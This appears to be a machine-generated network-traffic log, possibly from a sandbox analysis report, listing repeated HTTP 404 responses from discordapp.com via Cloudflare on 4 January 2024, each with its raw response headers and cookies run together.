SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WQiLeIRGM2bHAdrfuyQsVtvN6j%2F755CeM0oGbMeavMxDQYA8xEutf189UtxH%2B%2BxnEPBccO4g3E6%2B0E7cPreSLGbAOQRTpMXqdFj6Zhv7sTGz5nePS6vMPPhdnsxIoRTm5neHBg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=yem_vQ08PS_Lt1kTgHBg3CHHmDLoxTgvpGloyUfV10k-1704353448008-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:48 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c73f9e6681f9-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 21Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:48 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=MKK8WEi_OWHGSlzimNW1t5UeGs.nlJ4bh_6aKkvEm0c-1704353448-1-Aconw5ZfE3phJ3xn5YII7aM/M6c8VoRRsRQ+xccZbSjvSVyCVofFCtWcNVenCEKCErp5FzzKTBqt2ZbjFK8wHhA=; path=/; expires=Thu, 04-Jan-24 08:00:48 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=n2REsvgweyzKQgCZ%2BTszjYVRZDP%2B3M%2BdryL3wpez2%2FdjPRPFNVSDI1qiAB8%2FB2nRETQIebAmLdFZr%2FvEDX20uCT30D8s%2FoNSyyw8l7Z7BdvIrQIICFtBlwj7HAKrqOBo8aenng%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=44k_bmE1h17C0MhBR.FRKIhxQ1yzyp9tNASqJVqNLMo-1704353448917-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:49 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c74608b13b00-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 33Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:49 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=tIamJK0YHAKamF1inBA9eXfdGwQMFq2at2oZ7PqK74M-1704353449-1-ASS3esW0JXjawT0S2fX0FODGvC7hDLK6cZRFVmXWeGl3rYtYxovXM7cPpVkUxKUFlwusASd+hdiCpm9cjkhDjkg=; path=/; expires=Thu, 04-Jan-24 08:00:49 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Xkhu5M%2FlhItB1PCDv53FPjJjdat0n07XP06E35VMXB%2FeOn2dNUWBiOXs7eiyB1ebnBH7u9fg0KFU03VPZbrzFwFKcMRMyTbX8YSi28tnsERO5k26xc%2B%2BWOSwQg7s943lTtvfXQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=sr4gtKNVjL0QyryJvkUAIifruV__34NHn1lYe98iY_E-1704353449958-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:50 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c74bacb407dd-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 34Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:50 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=2F3GNbnZRzOCDnBEJ_flDUptjtcy7G1kOupf09P1ZWo-1704353450-1-AXewBf8cNlHfoRo4f1CW41nNIMnyaBkTMJiBAiF0tjvUK6E7Z5zBayGfpChMyvXl26Xyc3fJWfU36qh0wV5iQVA=; path=/; expires=Thu, 04-Jan-24 08:00:50 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XC70hoZ0srUtfVtUrR%2FfbO2VeXy22HXajrL677lSYq00hWYP6HSgawVHHFqnnBtn8SLg4JRxg71G1Gk5HkBCGdxslFvxLEsq8U7O%2FtFsAIMUFk5VqxzyyK4%2BGZkhijldSghsqw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=R4FirR2JOAfQdueETRBubiaRFfVdb.Wz4kMbOrHDoUs-1704353450859-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:51 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c7521ce60a89-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 31Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:51 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPo68x3Nutk82wQqX4y_02ILwLkYbrPVy6fnJOIMbsJSjx-lhijlLo2U-vo0wrsYdl0hyzIX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=ePwIXFEeXkPABrzeYtE90XduZx0HdXC_uMI0gEfbKCE-1704353451-1-AcA4bFz/2L7Wc7Z3DHDLgIF/e9n5b71BhbfAY2XLBOiPf7VbdxjJZjbNgUuRvsvEE5UDCsGml4XU54/Cd+DSAHA=; path=/; expires=Thu, 04-Jan-24 08:00:51 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7%2BtzEc3O3SXrB3Zpu12t5r3TeBLz%2FlC2QM3kjJsJXC62mjZO4UmokAnUUnobANrf6usHX47n%2FPAb8neOgsncsOYfOanfS8ZpkVcJbfS4SPdNMltb8XX1u6KvPk1QdBf455VMfA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=UGQ0VKDqfFyY3qsz7sOYP24xQo0neV2npRXIBvTR1Os-1704353451876-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:52 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c757ce648012-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 14Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:52 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=hN.lvWiGFALKMdStIIybQc67.4KnT4SGA4fmq.oNdrw-1704353452-1-AdRGASoRg84tAtgH+znN86vN3i2pCpqHtLPIFUoDXdkTWlrl+Ug8+055zle3Lyr30jopEZ2S/1jKGrhEB5UJNBg=; path=/; expires=Thu, 04-Jan-24 08:00:52 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AjJqhJ8jQKdUqUFr3%2B9dS255J3r3KrJv1MiSMvXRyhabYThz1CnGnYEVh6J6nv0R3CH%2B0Y3rdt%2F7723ektpAHkNux0ckNoDh5peBOTF6XONjIUxq89bkT%2FUhgGe8IWDo6iniUg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=SOxnYV2Vkj0uxgRi1OI04WKzS_GF8T5yPOeLmSITEqo-1704353452793-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:53 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c75e488f802a-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 15Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:53 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=v4Wq7RoDW9j1gUFMuX4hIST9cKPaWJVOM2EUaHJwOnc-1704353453-1-Aebc+bP5UZdzL1AJSTMUtBf/EhkLYHB/YpsQ685IFDL4p3B9JcyK5JeAk8nS78YFE/fljoF6CKhLXpdVFZljub8=; path=/; expires=Thu, 04-Jan-24 08:00:53 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jPVXtl0Jk3X7Pf9DnscrjlL%2FdWGR8kfECVSaOmzFGtLuqUJnW4l7%2Fb65pPhxhZqCTjcy2iDwhLgzyQDS4hozdkwBKHoYxb1plmcrvliaWpjyUC4sb6UI%2F9MHBd37ceaqqB7ZGw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=ItD9PK.gnitprihoHMi0NEs_93kv4vTiwBDg5_8rg88-1704353453839-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:55 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c76689933b95-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 39Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:55 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=MeaaVKVlwrdmTSoYoDOhqF3pDtFBJzryBZNmxvZeuto-1704353455-1-AYeLlQY97ZmnHWUhtlC+h11v9pe7jE66GPTltajK3S3fHMW+OMUAQQoo5tCcVggOJhsfBweLB02EXTrBXURG4Z8=; path=/; expires=Thu, 04-Jan-24 08:00:55 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0yKLPhDCLcuL8GbQCvi%2FF2MIyrQ%2B8yCb4B6pLTKIy0WKVRgdF1RZSk0wsTV4cuBNZMiAue3tCw9rcCtgoK%2FfS%2FPabk%2BFUAex%2F6wbxVlJah7eJae8VQZI6LljSYAjx%2F%2BIFoYWag%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=npXo4AOR2eFk3CbUAUk3CJiH9WgJzwu4EF_X5Z5XNy0-1704353455145-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:55 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c769bd7b7fe2-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 17Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:55 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=Np23XXOxqYTFs3M5sGHrFmxN9dBU.QijTPf76BHsGv8-1704353455-1-AfpwDrAldrRtOzibDP3/LmP8jZVdpot+VkxJpz3EIqJP8khdu9vpqAruj78FvM0MUET0kb614gL86H24heY0kAo=; path=/; expires=Thu, 04-Jan-24 08:00:55 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bxEjKhpTM24oc5FAm5epdesUhA4AxUrrFCv7wWWfMdSHp0foFhOFSaq25ehzICJ8Ga0TtHMjamZDUePltJ3C9eredBKxesH0pSLpt4Zo27hCyOWpL8y0Mdjlee9qZN80BCm9ow%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=aSIZNNwMBfRPwKIRlDVGqsPz4PDsgkiwS0FOv2i56aY-1704353455664-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:57 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c7731c7e2892-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 39Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:57 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpAlGdKaN1uiBpjD2ZqIMs0BtE911xE7HCoSFLPLd1NPY-8PyHba9dJDWmELy731FdKcKTHaHKjWQX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=7PM9suzzwclKwupMseAtu4Rh6IUP4qOpludZ.1ScsIg-1704353457-1-AZ7W7RNY9d+jARDjFoqOtGdsPS5H/4mOTy4j8lFzr+yXpNfIC/vv3/AYERqMZf7Cr7Vj4qhbUqTfDGfCN9RqmnQ=; path=/; expires=Thu, 04-Jan-24 08:00:57 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Od%2FAPB4U3YgxwRvH3ql9OgQVmULGyNz6ar3xpTjZ7WwgEXsU6PAXmROook%2BSgTDk3EzUMmGFRdNcnxG8LICOP5oqt4gLc2I8xYhbCIO4L7JfqIU8TA2wRzrhS3K5pLbJOu%2BMlw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=mJYQzaxLDbsbRzOsZpchSkBKVDdxOMX7MMxgLLQ9A5A-1704353457147-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:57 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c775dd053b35-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 41Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:57 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=jFyIK4QoMbNPG6ETqlTgs2Y_nla7XhmJcONcrzHDgFk-1704353457-1-ASpYzZYsj00N4AveCOTLbBvlS3wUgi5NO37ybDFr2nocOwBu+B8hFDoZTCpgGqf2qJP3Go/nsFmgeHBTXTKBPrc=; path=/; expires=Thu, 04-Jan-24 08:00:57 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ahTSZgCCUwv2JDkB28LKZ0voGPustCLvNj%2Ftq%2Fa3%2FJte2EeI9niugLDZ%2FZCQRbcO%2FN2eLjnOhbF8K%2B%2FzBW%2BTWTtWGqtTmHsQiLzC2mTq61BfduqKmq9%2FKqjntBDim%2BDyzXRwjA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=bMPrB9JpHO_Wk0RQT.ZK1urBk.PshQTjZRleQCf2wDM-1704353457614-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:59 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c780789e824e-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 32Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:59 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=MkWZc5ScCtCqECzdlXQYI.ZPsYOXPNcX5LC5s.dfAhQ-1704353459-1-Ad/z1EBJbkLp7miC+125UljwmRAhEzjtcvatuLdHm/avcP4HQGWu5Bl5S5NrD7xtHYavTeGYFxmVpQA+2sXQfiE=; path=/; expires=Thu, 04-Jan-24 08:00:59 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gh5qVXEJv1NwYq2w9V1cKKeyyWKMCfqQXX%2FWDVHgeRvpYHFXqogDM38m%2FH1jbF1A6kOinx4XP5FQ32%2BpHkg4ZqxlOGVnZqr8iOJ4ysYGWOwxOi6f5BiTndzetJLvQFlI4gVOLw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=WO_L6KwiDc6cXwPamEI6On9G7obBRLQ.HmGOcws_UdE-1704353459293-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:30:59 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c78259488220-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 32Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:30:59 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=6tSafKDDjOatgfZgZLes31koXsqBZEeno3LhVLg5kkQ-1704353459-1-AcvjEdf21u9E0018KGKwYM3eXJZPDZwC6T+KshQY9BUKL4cQxnEkEQja8ocUZoSLh2oI73uImRWsYsP9S6sodYI=; path=/; expires=Thu, 04-Jan-24 08:00:59 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GZ2tsPCrBwDDAtuVxi%2BA5XW7I3QVjiIzB9grB2y8TQHYUfqLCFMEf9sWsEfiImD70E%2B117q5hdXX8350aUgAEAjKFD8G516J8%2BE2uMNqSK7e1ocpOkEHiYiuTWHXkbD9RsTWCA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=IZhHDEegTdl7nN65WYV1_ndpAtB3P6HK8QtM.ZY2pPc-1704353459598-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:01 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c78dcd788f0a-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 23Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:01 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=preXhIOTj8j3bV_3yVzSkSVM95JdJQOberMpFoqCGpQ-1704353461-1-AahOjIjM0i36TF9BZHWumYymP5osjyJukOBnVw+Rf2NYTBoIQez0V9medmTPLnnbM5NREVH/5cTTm0nI1wbPakc=; path=/; expires=Thu, 04-Jan-24 08:01:01 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tizwvozQvvucMQ4Nl4G3oXQWQX%2FgCFtX%2FkIrmBd1gCXe%2FX%2BZqtMUb%2FnrRCC76jilqUicmmqsa%2BSHPnmrSzzKIexmKThcg1r17cvj7Q%2F%2Fuym5dweWbRV35YhkuN2Nr3yrNQxKAg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=Z33fS1TWLwHH.sdcQFAMvqdJg1GHcxC8MR04Ap1cJKg-1704353461430-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:01 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c78fae4f6ff1-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 34Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:01 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=CSRitRGcLnoGUk82RHHBqOMGILWb_VorWWSrh1bQqes-1704353461-1-Ad+7ilCCjIW/POuuvvfi+53ISHyaNU0KnBlRRnEdr2eU58DP/t4yS+RsQ950Eq5m5vPPhvD+Xw/9abQbalwtc88=; path=/; expires=Thu, 04-Jan-24 08:01:01 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tHB6xjWMONH%2BaMEwWSETPZjnk6P0eofTx1AUw7WC9SxvHHDwKV8zjHOnTVcBrh4HE%2FajIg8XLybmhcOo0kBEnG4b0KfBCK2Ck%2BzAxjt7ycDxusinmVvaaWLwZ7EVGBq%2BMEGO4w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=taCry0q8.k4J.rzULP3nAACYsIcvuuCdZvob8aobMhQ-1704353461732-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:05 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c7a7ceb66f9b-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 38Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:05 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLwX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=QioupIIiWihXW9oRlWwqOlWKfYDgYJDZiKdsbeUh1zw-1704353465-1-AaTL9Dyq60g8SrzmAs2U12OHGtl5RmAbvt2mnSpt1vQTlFbi5Dp4aUxtnngW0K1aGbFd8IdO5c/Ww3Isg2Ye4AQ=; path=/; expires=Thu, 04-Jan-24 08:01:05 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B5HHkFtyPZGd8%2F9tH1Rp5cWgtOXver%2FEJrQFw4h72zAzWvrtt9cxoF7I1lBfCiu13pEmn%2BNYUi0niUYuRkVx%2FJUpl%2Ff9mZDbFg%2Buf4NZ5RiV9clLcviqjXNMIWuvEH2QaqAy1Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=kKbyUJ32_6BPHmO4sQdCdUXNZEiW3XqcM4IQClBwulg-1704353465589-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jan 2024 07:31:07 GMTContent-Type: application/xml; charset=UTF-8Content-Length: 236Connection: closeCF-Ray: 8401c7b11a423b24-IADCF-Cache-Status: HITAccept-Ranges: bytesAge: 51Cache-Control: public, max-age=31536000Content-Disposition: attachmentExpires: Fri, 03 Jan 2025 07:31:07 GMTVary: Accept-EncodingAlt-Svc: h3=":443"; ma=86400X-GUploader-UploadID: ABPtcPpnDEXM9ZU-YXeyr-01FXF-iSbsKGRr8QoLoQnbp3S9RQtXPnw6PpkDhWLrWXESBz_nnE8X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=E95nCx6fIT00iOI0tgeyrjqZjUuTOzlPKuykEB7QyyM-1704353467-1-AX+p1ukirrYvlVi7MkWl6+TZXICK95mmy4VW4tCM/BfARLUX+arj4oK3YqHAx6CuiEiBm4ps6863kPNdrGaqdgg=; path=/; expires=Thu, 04-Jan-24 08:01:07 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZklGWXob6jW3BB9ve7btsgK%2BdbZLhiL0l8Ro12T5S01CKX5rsfW0XuV3duumxydbjCAcP0A33QEseY8nxYJCnycO6saiBqTjcVxPbMegPFnA1s%2Bc2iaGjWHOIeHUooAt8b6Y7w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=UQJDsiGwvPk94C4vuiqJSdZ9EMO7Zk5j75hhdvZSIA8-1704353467081-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflare
